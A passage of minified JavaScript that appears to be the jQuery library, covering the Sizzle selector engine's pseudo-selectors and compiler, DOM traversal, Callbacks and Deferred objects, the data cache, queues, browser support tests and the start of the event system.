b,d=[],e=0,f=0;if(j=!c.detectDuplicates,i=!c.sortStable&&a.slice(0),a.sort(z),j){while(b=a[f++])b===a[f]&&(e=d.push(f));while(e--)a.splice(d[e],1)}return i=null,a},e=db.getText=function(a){var b,c="",d=0,f=a.nodeType;if(f){if(1===f||9===f||11===f){if("string"==typeof a.textContent)return a.textContent;for(a=a.firstChild;a;a=a.nextSibling)c+=e(a)}else if(3===f||4===f)return a.nodeValue}else while(b=a[d++])c+=e(b);return c},d=db.selectors={cacheLength:50,createPseudo:fb,match:V,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(a){return a[1]=a[1].replace(ab,bb),a[3]=(a[4]||a[5]||"").replace(ab,bb),"~="===a[2]&&(a[3]=" "+a[3]+" "),a.slice(0,4)},CHILD:function(a){return a[1]=a[1].toLowerCase(),"nth"===a[1].slice(0,3)?(a[3]||db.error(a[0]),a[4]=+(a[4]?a[5]+(a[6]||1):2*("even"===a[3]||"odd"===a[3])),a[5]=+(a[7]+a[8]||"odd"===a[3])):a[3]&&db.error(a[0]),a},PSEUDO:function(a){var b,c=!a[5]&&a[2];return V.CHILD.test(a[0])?null:(a[3]&&void 0!==a[4]?a[2]=a[4]:c&&T.test(c)&&(b=ob(c,!0))&&(b=c.indexOf(")",c.length-b)-c.length)&&(a[0]=a[0].slice(0,b),a[2]=c.slice(0,b)),a.slice(0,3))}},filter:{TAG:function(a){var b=a.replace(ab,bb).toLowerCase();return"*"===a?function(){return!0}:function(a){return a.nodeName&&a.nodeName.toLowerCase()===b}},CLASS:function(a){var b=w[a+" "];return b||(b=new RegExp("(^|"+K+")"+a+"("+K+"|$)"))&&w(a,function(a){return b.test("string"==typeof a.className&&a.className||typeof a.getAttribute!==A&&a.getAttribute("class")||"")})},ATTR:function(a,b,c){return function(d){var e=db.attr(d,a);return null==e?"!="===b:b?(e+="","="===b?e===c:"!="===b?e!==c:"^="===b?c&&0===e.indexOf(c):"*="===b?c&&e.indexOf(c)>-1:"$="===b?c&&e.slice(-c.length)===c:"~="===b?(" "+e+" ").indexOf(c)>-1:"|="===b?e===c||e.slice(0,c.length+1)===c+"-":!1):!0}},CHILD:function(a,b,c,d,e){var f="nth"!==a.slice(0,3),g="last"!==a.slice(-4),h="of-type"===b;return 1===d&&0===e?function(a){return!!a.parentNode}:function(b,c,i){var j,k,l,m,n,o,p=f!==g?"nextSibling":"previousSibling",q=b.parentNode,r=h&&b.nodeName.toLowerCase(),t=!i&&!h;if(q){if(f){while(p){l=b;while(l=l[p])if(h?l.nodeName.toLowerCase()===r:1===l.nodeType)return!1;o=p="only"===a&&!o&&"nextSibling"}return!0}if(o=[g?q.firstChild:q.lastChild],g&&t){k=q[s]||(q[s]={}),j=k[a]||[],n=j[0]===u&&j[1],m=j[0]===u&&j[2],l=n&&q.childNodes[n];while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if(1===l.nodeType&&++m&&l===b){k[a]=[u,n,m];break}}else if(t&&(j=(b[s]||(b[s]={}))[a])&&j[0]===u)m=j[1];else while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if((h?l.nodeName.toLowerCase()===r:1===l.nodeType)&&++m&&(t&&((l[s]||(l[s]={}))[a]=[u,m]),l===b))break;return m-=e,m===d||m%d===0&&m/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||db.error("unsupported pseudo: "+a);return e[s]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?fb(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=I.call(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudos:{not:fb(function(a){var b=[],c=[],d=g(a.replace(P,"$1"));return d[s]?fb(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),!c.pop()}}),has:fb(function(a){return function(b){return db(a,b).length>0}}),contains:fb(function(a){return function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:fb(function(a){return U.test(a||"")||db.error("unsupported lang: "+a),a=a.replace(ab,bb).toLowerCase(),function(b){var c;do if(c=n?b.lang:b.getAttribute("xml:lang")||b.getAttribute("lang"))return c=c.toLowerCase(),c===a||0===c.indexOf(a+"-");while((b=b.parentNode)&&1===b.nodeType);return!1}}),target:function(b){var c=a.location&&a.location.hash;return c&&c.slice(1)===b.id},root:function(a){return a===m},focus:function(a){return a===l.activeElement&&(!l.hasFocus||l.hasFocus())&&!!(a.type||a.href||~a.tabIndex)},enabled:function(a){return a.disabled===!1},disabled:function(a){return a.disabled===!0},checked:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&!!a.checked||"option"===b&&!!a.selected},selected:function(a){return a.parentNode&&a.parentNode.selectedIndex,a.selected===!0},empty:function(a){for(a=a.firstChild;a;a=a.nextSibling)if(a.nodeType<6)return!1;return!0},parent:function(a){return!d.pseudos.empty(a)},header:function(a){return X.test(a.nodeName)},input:function(a){return W.test(a.nodeName)},button:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&"button"===a.type||"button"===b},text:function(a){var b;return"input"===a.nodeName.toLowerCase()&&"text"===a.type&&(null==(b=a.getAttribute("type"))||"text"===b.toLowerCase())},first:lb(function(){return[0]}),last:lb(function(a,b){return[b-1]}),eq:lb(function(a,b,c){return[0>c?c+b:c]}),even:lb(function(a,b){for(var c=0;b>c;c+=2)a.push(c);return a}),odd:lb(function(a,b){for(var c=1;b>c;c+=2)a.push(c);return a}),lt:lb(function(a,b,c){for(var d=0>c?c+b:c;--d>=0;)a.push(d);return a}),gt:lb(function(a,b,c){for(var d=0>c?c+b:c;++d<b;)a.push(d);return a})}},d.pseudos.nth=d.pseudos.eq;for(b in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})d.pseudos[b]=jb(b);for(b in{submit:!0,reset:!0})d.pseudos[b]=kb(b);function nb(){}nb.prototype=d.filters=d.pseudos,d.setFilters=new nb;function ob(a,b){var c,e,f,g,h,i,j,k=x[a+" "];if(k)return b?0:k.slice(0);h=a,i=[],j=d.preFilter;while(h){(!c||(e=Q.exec(h)))&&(e&&(h=h.slice(e[0].length)||h),i.push(f=[])),c=!1,(e=R.exec(h))&&(c=e.shift(),f.push({value:c,type:e[0].replace(P," ")}),h=h.slice(c.length));for(g in d.filter)!(e=V[g].exec(h))||j[g]&&!(e=j[g](e))||(c=e.shift(),f.push({value:c,type:g,matches:e}),h=h.slice(c.length));if(!c)break}return b?h.length:h?db.error(a):x(a,i).slice(0)}function pb(a){for(var b=0,c=a.length,d="";c>b;b++)d+=a[b].value;return d}function qb(a,b,c){var d=b.dir,e=c&&"parentNode"===d,f=v++;return b.first?function(b,c,f){while(b=b[d])if(1===b.nodeType||e)return a(b,c,f)}:function(b,c,g){var h,i,j=[u,f];if(g){while(b=b[d])if((1===b.nodeType||e)&&a(b,c,g))return!0}else while(b=b[d])if(1===b.nodeType||e){if(i=b[s]||(b[s]={}),(h=i[d])&&h[0]===u&&h[1]===f)return j[2]=h[2];if(i[d]=j,j[2]=a(b,c,g))return!0}}}function rb(a){return a.length>1?function(b,c,d){var e=a.length;while(e--)if(!a[e](b,c,d))return!1;return!0}:a[0]}function sb(a,b,c,d,e){for(var f,g=[],h=0,i=a.length,j=null!=b;i>h;h++)(f=a[h])&&(!c||c(f,d,e))&&(g.push(f),j&&b.push(h));return g}function tb(a,b,c,d,e,f){return d&&!d[s]&&(d=tb(d)),e&&!e[s]&&(e=tb(e,f)),fb(function(f,g,h,i){var j,k,l,m=[],n=[],o=g.length,p=f||wb(b||"*",h.nodeType?[h]:h,[]),q=!a||!f&&b?p:sb(p,m,a,h,i),r=c?e||(f?a:o||d)?[]:g:q;if(c&&c(q,r,h,i),d){j=sb(r,n),d(j,[],h,i),k=j.length;while(k--)(l=j[k])&&(r[n[k]]=!(q[n[k]]=l))}if(f){if(e||a){if(e){j=[],k=r.length;while(k--)(l=r[k])&&j.push(q[k]=l);e(null,r=[],j,i)}k=r.length;while(k--)(l=r[k])&&(j=e?I.call(f,l):m[k])>-1&&(f[j]=!(g[j]=l))}}else r=sb(r===g?r.splice(o,r.length):r),e?e(null,g,r,i):G.apply(g,r)})}function ub(a){for(var b,c,e,f=a.length,g=d.relative[a[0].type],i=g||d.relative[" "],j=g?1:0,k=qb(function(a){return a===b},i,!0),l=qb(function(a){return I.call(b,a)>-1},i,!0),m=[function(a,c,d){return!g&&(d||c!==h)||((b=c).nodeType?k(a,c,d):l(a,c,d))}];f>j;j++)if(c=d.relative[a[j].type])m=[qb(rb(m),c)];else{if(c=d.filter[a[j].type].apply(null,a[j].matches),c[s]){for(e=++j;f>e;e++)if(d.relative[a[e].type])break;return tb(j>1&&rb(m),j>1&&pb(a.slice(0,j-1).concat({value:" "===a[j-2].type?"*":""})).replace(P,"$1"),c,e>j&&ub(a.slice(j,e)),f>e&&ub(a=a.slice(e)),f>e&&pb(a))}m.push(c)}return rb(m)}function vb(a,b){var c=b.length>0,e=a.length>0,f=function(f,g,i,j,k){var m,n,o,p=0,q="0",r=f&&[],s=[],t=h,v=f||e&&d.find.TAG("*",k),w=u+=null==t?1:Math.random()||.1,x=v.length;for(k&&(h=g!==l&&g);q!==x&&null!=(m=v[q]);q++){if(e&&m){n=0;while(o=a[n++])if(o(m,g,i)){j.push(m);break}k&&(u=w)}c&&((m=!o&&m)&&p--,f&&r.push(m))}if(p+=q,c&&q!==p){n=0;while(o=b[n++])o(r,s,g,i);if(f){if(p>0)while(q--)r[q]||s[q]||(s[q]=E.call(j));s=sb(s)}G.apply(j,s),k&&!f&&s.length>0&&p+b.length>1&&db.uniqueSort(j)}return k&&(u=w,h=t),r};return c?fb(f):f}g=db.compile=function(a,b){var c,d=[],e=[],f=y[a+" "];if(!f){b||(b=ob(a)),c=b.length;while(c--)f=ub(b[c]),f[s]?d.push(f):e.push(f);f=y(a,vb(e,d))}return f};function wb(a,b,c){for(var d=0,e=b.length;e>d;d++)db(a,b[d],c);return c}function xb(a,b,e,f){var h,i,j,k,l,m=ob(a);if(!f&&1===m.length){if(i=m[0]=m[0].slice(0),i.length>2&&"ID"===(j=i[0]).type&&c.getById&&9===b.nodeType&&n&&d.relative[i[1].type]){if(b=(d.find.ID(j.matches[0].replace(ab,bb),b)||[])[0],!b)return e;a=a.slice(i.shift().value.length)}h=V.needsContext.test(a)?0:i.length;while(h--){if(j=i[h],d.relative[k=j.type])break;if((l=d.find[k])&&(f=l(j.matches[0].replace(ab,bb),$.test(i[0].type)&&mb(b.parentNode)||b))){if(i.splice(h,1),a=f.length&&pb(i),!a)return G.apply(e,f),e;break}}}return g(a,m)(f,b,!n,e,$.test(a)&&mb(b.parentNode)||b),e}return c.sortStable=s.split("").sort(z).join("")===s,c.detectDuplicates=!!j,k(),c.sortDetached=gb(function(a){return 1&a.compareDocumentPosition(l.createElement("div"))}),gb(function(a){return a.innerHTML="<a href='#'></a>","#"===a.firstChild.getAttribute("href")})||hb("type|href|height|width",function(a,b,c){return c?void 0:a.getAttribute(b,"type"===b.toLowerCase()?1:2)}),c.attributes&&gb(function(a){return a.innerHTML="<input/>",a.firstChild.setAttribute("value",""),""===a.firstChild.getAttribute("value")})||hb("value",function(a,b,c){return c||"input"!==a.nodeName.toLowerCase()?void 0:a.defaultValue}),gb(function(a){return null==a.getAttribute("disabled")})||hb(J,function(a,b,c){var d;return c?void 0:a[b]===!0?b.toLowerCase():(d=a.getAttributeNode(b))&&d.specified?d.value:null}),db}(a);n.find=t,n.expr=t.selectors,n.expr[":"]=n.expr.pseudos,n.unique=t.uniqueSort,n.text=t.getText,n.isXMLDoc=t.isXML,n.contains=t.contains;var u=n.expr.match.needsContext,v=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,w=/^.[^:#\[\.,]*$/;function x(a,b,c){if(n.isFunction(b))return n.grep(a,function(a,d){return!!b.call(a,d,a)!==c});if(b.nodeType)return n.grep(a,function(a){return a===b!==c});if("string"==typeof b){if(w.test(b))return n.filter(b,a,c);b=n.filter(b,a)}return n.grep(a,function(a){return n.inArray(a,b)>=0!==c})}n.filter=function(a,b,c){var d=b[0];return c&&(a=":not("+a+")"),1===b.length&&1===d.nodeType?n.find.matchesSelector(d,a)?[d]:[]:n.find.matches(a,n.grep(b,function(a){return 1===a.nodeType}))},n.fn.extend({find:function(a){var b,c=[],d=this,e=d.length;if("string"!=typeof a)return this.pushStack(n(a).filter(function(){for(b=0;e>b;b++)if(n.contains(d[b],this))return!0}));for(b=0;e>b;b++)n.find(a,d[b],c);return c=this.pushStack(e>1?n.unique(c):c),c.selector=this.selector?this.selector+" "+a:a,c},filter:function(a){return this.pushStack(x(this,a||[],!1))},not:function(a){return this.pushStack(x(this,a||[],!0))},is:function(a){return!!x(this,"string"==typeof a&&u.test(a)?n(a):a||[],!1).length}});var y,z=a.document,A=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,B=n.fn.init=function(a,b){var c,d;if(!a)return this;if("string"==typeof a){if(c="<"===a.charAt(0)&&">"===a.charAt(a.length-1)&&a.length>=3?[null,a,null]:A.exec(a),!c||!c[1]&&b)return!b||b.jquery?(b||y).find(a):this.constructor(b).find(a);if(c[1]){if(b=b instanceof n?b[0]:b,n.merge(this,n.parseHTML(c[1],b&&b.nodeType?b.ownerDocument||b:z,!0)),v.test(c[1])&&n.isPlainObject(b))for(c in b)n.isFunction(this[c])?this[c](b[c]):this.attr(c,b[c]);return this}if(d=z.getElementById(c[2]),d&&d.parentNode){if(d.id!==c[2])return y.find(a);this.length=1,this[0]=d}return this.context=z,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):n.isFunction(a)?"undefined"!=typeof y.ready?y.ready(a):a(n):(void 0!==a.selector&&(this.selector=a.selector,this.context=a.context),n.makeArray(a,this))};B.prototype=n.fn,y=n(z);var C=/^(?:parents|prev(?:Until|All))/,D={children:!0,contents:!0,next:!0,prev:!0};n.extend({dir:function(a,b,c){var d=[],e=a[b];while(e&&9!==e.nodeType&&(void 0===c||1!==e.nodeType||!n(e).is(c)))1===e.nodeType&&d.push(e),e=e[b];return d},sibling:function(a,b){for(var c=[];a;a=a.nextSibling)1===a.nodeType&&a!==b&&c.push(a);return c}}),n.fn.extend({has:function(a){var b,c=n(a,this),d=c.length;return this.filter(function(){for(b=0;d>b;b++)if(n.contains(this,c[b]))return!0})},closest:function(a,b){for(var c,d=0,e=this.length,f=[],g=u.test(a)||"string"!=typeof a?n(a,b||this.context):0;e>d;d++)for(c=this[d];c&&c!==b;c=c.parentNode)if(c.nodeType<11&&(g?g.index(c)>-1:1===c.nodeType&&n.find.matchesSelector(c,a))){f.push(c);break}return this.pushStack(f.length>1?n.unique(f):f)},index:function(a){return a?"string"==typeof a?n.inArray(this[0],n(a)):n.inArray(a.jquery?a[0]:a,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(a,b){return this.pushStack(n.unique(n.merge(this.get(),n(a,b))))},addBack:function(a){return this.add(null==a?this.prevObject:this.prevObject.filter(a))}});function E(a,b){do a=a[b];while(a&&1!==a.nodeType);return a}n.each({parent:function(a){var b=a.parentNode;return b&&11!==b.nodeType?b:null},parents:function(a){return n.dir(a,"parentNode")},parentsUntil:function(a,b,c){return n.dir(a,"parentNode",c)},next:function(a){return E(a,"nextSibling")},prev:function(a){return E(a,"previousSibling")},nextAll:function(a){return n.dir(a,"nextSibling")},prevAll:function(a){return n.dir(a,"previousSibling")},nextUntil:function(a,b,c){return n.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return n.dir(a,"previousSibling",c)},siblings:function(a){return n.sibling((a.parentNode||{}).firstChild,a)},children:function(a){return n.sibling(a.firstChild)},contents:function(a){return n.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:n.merge([],a.childNodes)}},function(a,b){n.fn[a]=function(c,d){var e=n.map(this,b,c);return"Until"!==a.slice(-5)&&(d=c),d&&"string"==typeof d&&(e=n.filter(d,e)),this.length>1&&(D[a]||(e=n.unique(e)),C.test(a)&&(e=e.reverse())),this.pushStack(e)}});var F=/\S+/g,G={};function H(a){var b=G[a]={};return n.each(a.match(F)||[],function(a,c){b[c]=!0}),b}n.Callbacks=function(a){a="string"==typeof a?G[a]||H(a):n.extend({},a);var b,c,d,e,f,g,h=[],i=!a.once&&[],j=function(l){for(c=a.memory&&l,d=!0,f=g||0,g=0,e=h.length,b=!0;h&&e>f;f++)if(h[f].apply(l[0],l[1])===!1&&a.stopOnFalse){c=!1;break}b=!1,h&&(i?i.length&&j(i.shift()):c?h=[]:k.disable())},k={add:function(){if(h){var d=h.length;!function f(b){n.each(b,function(b,c){var d=n.type(c);"function"===d?a.unique&&k.has(c)||h.push(c):c&&c.length&&"string"!==d&&f(c)})}(arguments),b?e=h.length:c&&(g=d,j(c))}return this},remove:function(){return h&&n.each(arguments,function(a,c){var d;while((d=n.inArray(c,h,d))>-1)h.splice(d,1),b&&(e>=d&&e--,f>=d&&f--)}),this},has:function(a){return a?n.inArray(a,h)>-1:!(!h||!h.length)},empty:function(){return h=[],e=0,this},disable:function(){return h=i=c=void 0,this},disabled:function(){return!h},lock:function(){return i=void 0,c||k.disable(),this},locked:function(){return!i},fireWith:function(a,c){return!h||d&&!i||(c=c||[],c=[a,c.slice?c.slice():c],b?i.push(c):j(c)),this},fire:function(){return k.fireWith(this,arguments),this},fired:function(){return!!d}};return k},n.extend({Deferred:function(a){var b=[["resolve","done",n.Callbacks("once memory"),"resolved"],["reject","fail",n.Callbacks("once memory"),"rejected"],["notify","progress",n.Callbacks("memory")]],c="pending",d={state:function(){return c},always:function(){return e.done(arguments).fail(arguments),this},then:function(){var a=arguments;return n.Deferred(function(c){n.each(b,function(b,f){var g=n.isFunction(a[b])&&a[b];e[f[1]](function(){var a=g&&g.apply(this,arguments);a&&n.isFunction(a.promise)?a.promise().done(c.resolve).fail(c.reject).progress(c.notify):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?n.extend(a,d):d}},e={};return d.pipe=d.then,n.each(b,function(a,f){var g=f[2],h=f[3];d[f[1]]=g.add,h&&g.add(function(){c=h},b[1^a][2].disable,b[2][2].lock),e[f[0]]=function(){return e[f[0]+"With"](this===e?d:this,arguments),this},e[f[0]+"With"]=g.fireWith}),d.promise(e),a&&a.call(e,e),e},when:function(a){var b=0,c=d.call(arguments),e=c.length,f=1!==e||a&&n.isFunction(a.promise)?e:0,g=1===f?a:n.Deferred(),h=function(a,b,c){return function(e){b[a]=this,c[a]=arguments.length>1?d.call(arguments):e,c===i?g.notifyWith(b,c):--f||g.resolveWith(b,c)}},i,j,k;if(e>1)for(i=new Array(e),j=new Array(e),k=new Array(e);e>b;b++)c[b]&&n.isFunction(c[b].promise)?c[b].promise().done(h(b,k,c)).fail(g.reject).progress(h(b,j,i)):--f;return f||g.resolveWith(k,c),g.promise()}});var I;n.fn.ready=function(a){return n.ready.promise().done(a),this},n.extend({isReady:!1,readyWait:1,holdReady:function(a){a?n.readyWait++:n.ready(!0)},ready:function(a){if(a===!0?!--n.readyWait:!n.isReady){if(!z.body)return setTimeout(n.ready);n.isReady=!0,a!==!0&&--n.readyWait>0||(I.resolveWith(z,[n]),n.fn.trigger&&n(z).trigger("ready").off("ready"))}}});function J(){z.addEventListener?(z.removeEventListener("DOMContentLoaded",K,!1),a.removeEventListener("load",K,!1)):(z.detachEvent("onreadystatechange",K),a.detachEvent("onload",K))}function K(){(z.addEventListener||"load"===event.type||"complete"===z.readyState)&&(J(),n.ready())}n.ready.promise=function(b){if(!I)if(I=n.Deferred(),"complete"===z.readyState)setTimeout(n.ready);else if(z.addEventListener)z.addEventListener("DOMContentLoaded",K,!1),a.addEventListener("load",K,!1);else{z.attachEvent("onreadystatechange",K),a.attachEvent("onload",K);var c=!1;try{c=null==a.frameElement&&z.documentElement}catch(d){}c&&c.doScroll&&!function e(){if(!n.isReady){try{c.doScroll("left")}catch(a){return setTimeout(e,50)}J(),n.ready()}}()}return I.promise(b)};var L="undefined",M;for(M in n(l))break;l.ownLast="0"!==M,l.inlineBlockNeedsLayout=!1,n(function(){var a,b,c=z.getElementsByTagName("body")[0];c&&(a=z.createElement("div"),a.style.cssText="border:0;width:0;height:0;position:absolute;top:0;left:-9999px;margin-top:1px",b=z.createElement("div"),c.appendChild(a).appendChild(b),typeof b.style.zoom!==L&&(b.style.cssText="border:0;margin:0;width:1px;padding:1px;display:inline;zoom:1",(l.inlineBlockNeedsLayout=3===b.offsetWidth)&&(c.style.zoom=1)),c.removeChild(a),a=b=null)}),function(){var a=z.createElement("div");if(null==l.deleteExpando){l.deleteExpando=!0;try{delete a.test}catch(b){l.deleteExpando=!1}}a=null}(),n.acceptData=function(a){var b=n.noData[(a.nodeName+" ").toLowerCase()],c=+a.nodeType||1;return 1!==c&&9!==c?!1:!b||b!==!0&&a.getAttribute("classid")===b};var N=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,O=/([A-Z])/g;function P(a,b,c){if(void 0===c&&1===a.nodeType){var d="data-"+b.replace(O,"-$1").toLowerCase();if(c=a.getAttribute(d),"string"==typeof c){try{c="true"===c?!0:"false"===c?!1:"null"===c?null:+c+""===c?+c:N.test(c)?n.parseJSON(c):c}catch(e){}n.data(a,b,c)}else c=void 0}return c}function Q(a){var b;for(b in a)if(("data"!==b||!n.isEmptyObject(a[b]))&&"toJSON"!==b)return!1;return!0}function R(a,b,d,e){if(n.acceptData(a)){var f,g,h=n.expando,i=a.nodeType,j=i?n.cache:a,k=i?a[h]:a[h]&&h;if(k&&j[k]&&(e||j[k].data)||void 0!==d||"string"!=typeof b)return k||(k=i?a[h]=c.pop()||n.guid++:h),j[k]||(j[k]=i?{}:{toJSON:n.noop}),("object"==typeof b||"function"==typeof b)&&(e?j[k]=n.extend(j[k],b):j[k].data=n.extend(j[k].data,b)),g=j[k],e||(g.data||(g.data={}),g=g.data),void 0!==d&&(g[n.camelCase(b)]=d),"string"==typeof b?(f=g[b],null==f&&(f=g[n.camelCase(b)])):f=g,f
3 | }}function S(a,b,c){if(n.acceptData(a)){var d,e,f=a.nodeType,g=f?n.cache:a,h=f?a[n.expando]:n.expando;if(g[h]){if(b&&(d=c?g[h]:g[h].data)){n.isArray(b)?b=b.concat(n.map(b,n.camelCase)):b in d?b=[b]:(b=n.camelCase(b),b=b in d?[b]:b.split(" ")),e=b.length;while(e--)delete d[b[e]];if(c?!Q(d):!n.isEmptyObject(d))return}(c||(delete g[h].data,Q(g[h])))&&(f?n.cleanData([a],!0):l.deleteExpando||g!=g.window?delete g[h]:g[h]=null)}}}n.extend({cache:{},noData:{"applet ":!0,"embed ":!0,"object ":"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"},hasData:function(a){return a=a.nodeType?n.cache[a[n.expando]]:a[n.expando],!!a&&!Q(a)},data:function(a,b,c){return R(a,b,c)},removeData:function(a,b){return S(a,b)},_data:function(a,b,c){return R(a,b,c,!0)},_removeData:function(a,b){return S(a,b,!0)}}),n.fn.extend({data:function(a,b){var c,d,e,f=this[0],g=f&&f.attributes;if(void 0===a){if(this.length&&(e=n.data(f),1===f.nodeType&&!n._data(f,"parsedAttrs"))){c=g.length;while(c--)d=g[c].name,0===d.indexOf("data-")&&(d=n.camelCase(d.slice(5)),P(f,d,e[d]));n._data(f,"parsedAttrs",!0)}return e}return"object"==typeof a?this.each(function(){n.data(this,a)}):arguments.length>1?this.each(function(){n.data(this,a,b)}):f?P(f,a,n.data(f,a)):void 0},removeData:function(a){return this.each(function(){n.removeData(this,a)})}}),n.extend({queue:function(a,b,c){var d;return a?(b=(b||"fx")+"queue",d=n._data(a,b),c&&(!d||n.isArray(c)?d=n._data(a,b,n.makeArray(c)):d.push(c)),d||[]):void 0},dequeue:function(a,b){b=b||"fx";var c=n.queue(a,b),d=c.length,e=c.shift(),f=n._queueHooks(a,b),g=function(){n.dequeue(a,b)};"inprogress"===e&&(e=c.shift(),d--),e&&("fx"===b&&c.unshift("inprogress"),delete f.stop,e.call(a,g,f)),!d&&f&&f.empty.fire()},_queueHooks:function(a,b){var c=b+"queueHooks";return n._data(a,c)||n._data(a,c,{empty:n.Callbacks("once memory").add(function(){n._removeData(a,b+"queue"),n._removeData(a,c)})})}}),n.fn.extend({queue:function(a,b){var c=2;return"string"!=typeof a&&(b=a,a="fx",c--),arguments.length<c?n.queue(this[0],a):void 0===b?this:this.each(function(){var c=n.queue(this,a,b);n._queueHooks(this,a),"fx"===a&&"inprogress"!==c[0]&&n.dequeue(this,a)})},dequeue:function(a){return this.each(function(){n.dequeue(this,a)})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,b){var c,d=1,e=n.Deferred(),f=this,g=this.length,h=function(){--d||e.resolveWith(f,[f])};"string"!=typeof a&&(b=a,a=void 0),a=a||"fx";while(g--)c=n._data(f[g],a+"queueHooks"),c&&c.empty&&(d++,c.empty.add(h));return h(),e.promise(b)}});var T=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,U=["Top","Right","Bottom","Left"],V=function(a,b){return a=b||a,"none"===n.css(a,"display")||!n.contains(a.ownerDocument,a)},W=n.access=function(a,b,c,d,e,f,g){var h=0,i=a.length,j=null==c;if("object"===n.type(c)){e=!0;for(h in c)n.access(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,n.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(n(a),c)})),b))for(;i>h;h++)b(a[h],c,g?d:d.call(a[h],h,b(a[h],c)));return e?a:j?b.call(a):i?b(a[0],c):f},X=/^(?:checkbox|radio)$/i;!function(){var a=z.createDocumentFragment(),b=z.createElement("div"),c=z.createElement("input");if(b.setAttribute("className","t"),b.innerHTML="  <link/><table></table><a href='/a'>a</a>",l.leadingWhitespace=3===b.firstChild.nodeType,l.tbody=!b.getElementsByTagName("tbody").length,l.htmlSerialize=!!b.getElementsByTagName("link").length,l.html5Clone="<:nav></:nav>"!==z.createElement("nav").cloneNode(!0).outerHTML,c.type="checkbox",c.checked=!0,a.appendChild(c),l.appendChecked=c.checked,b.innerHTML="<textarea>x</textarea>",l.noCloneChecked=!!b.cloneNode(!0).lastChild.defaultValue,a.appendChild(b),b.innerHTML="<input type='radio' checked='checked' name='t'/>",l.checkClone=b.cloneNode(!0).cloneNode(!0).lastChild.checked,l.noCloneEvent=!0,b.attachEvent&&(b.attachEvent("onclick",function(){l.noCloneEvent=!1}),b.cloneNode(!0).click()),null==l.deleteExpando){l.deleteExpando=!0;try{delete b.test}catch(d){l.deleteExpando=!1}}a=b=c=null}(),function(){var b,c,d=z.createElement("div");for(b in{submit:!0,change:!0,focusin:!0})c="on"+b,(l[b+"Bubbles"]=c in a)||(d.setAttribute(c,"t"),l[b+"Bubbles"]=d.attributes[c].expando===!1);d=null}();var Y=/^(?:input|select|textarea)$/i,Z=/^key/,$=/^(?:mouse|contextmenu)|click/,_=/^(?:focusinfocus|focusoutblur)$/,ab=/^([^.]*)(?:\.(.+)|)$/;function bb(){return!0}function cb(){return!1}function db(){try{return z.activeElement}catch(a){}}n.event={global:{},add:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=n._data(a);if(r){c.handler&&(i=c,c=i.handler,e=i.selector),c.guid||(c.guid=n.guid++),(g=r.events)||(g=r.events={}),(k=r.handle)||(k=r.handle=function(a){return typeof n===L||a&&n.event.triggered===a.type?void 0:n.event.dispatch.apply(k.elem,arguments)},k.elem=a),b=(b||"").match(F)||[""],h=b.length;while(h--)f=ab.exec(b[h])||[],o=q=f[1],p=(f[2]||"").split(".").sort(),o&&(j=n.event.special[o]||{},o=(e?j.delegateType:j.bindType)||o,j=n.event.special[o]||{},l=n.extend({type:o,origType:q,data:d,handler:c,guid:c.guid,selector:e,needsContext:e&&n.expr.match.needsContext.test(e),namespace:p.join(".")},i),(m=g[o])||(m=g[o]=[],m.delegateCount=0,j.setup&&j.setup.call(a,d,p,k)!==!1||(a.addEventListener?a.addEventListener(o,k,!1):a.attachEvent&&a.attachEvent("on"+o,k))),j.add&&(j.add.call(a,l),l.handler.guid||(l.handler.guid=c.guid)),e?m.splice(m.delegateCount++,0,l):m.push(l),n.event.global[o]=!0);a=null}},remove:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=n.hasData(a)&&n._data(a);if(r&&(k=r.events)){b=(b||"").match(F)||[""],j=b.length;while(j--)if(h=ab.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o){l=n.event.special[o]||{},o=(d?l.delegateType:l.bindType)||o,m=k[o]||[],h=h[2]&&new RegExp("(^|\\.)"+p.join("\\.(?:.*\\.|)")+"(\\.|$)"),i=f=m.length;while(f--)g=m[f],!e&&q!==g.origType||c&&c.guid!==g.guid||h&&!h.test(g.namespace)||d&&d!==g.selector&&("**"!==d||!g.selector)||(m.splice(f,1),g.selector&&m.delegateCount--,l.remove&&l.remove.call(a,g));i&&!m.length&&(l.teardown&&l.teardown.call(a,p,r.handle)!==!1||n.removeEvent(a,o,r.handle),delete k[o])}else for(o in k)n.event.remove(a,o+b[j],c,d,!0);n.isEmptyObject(k)&&(delete r.handle,n._removeData(a,"events"))}},trigger:function(b,c,d,e){var 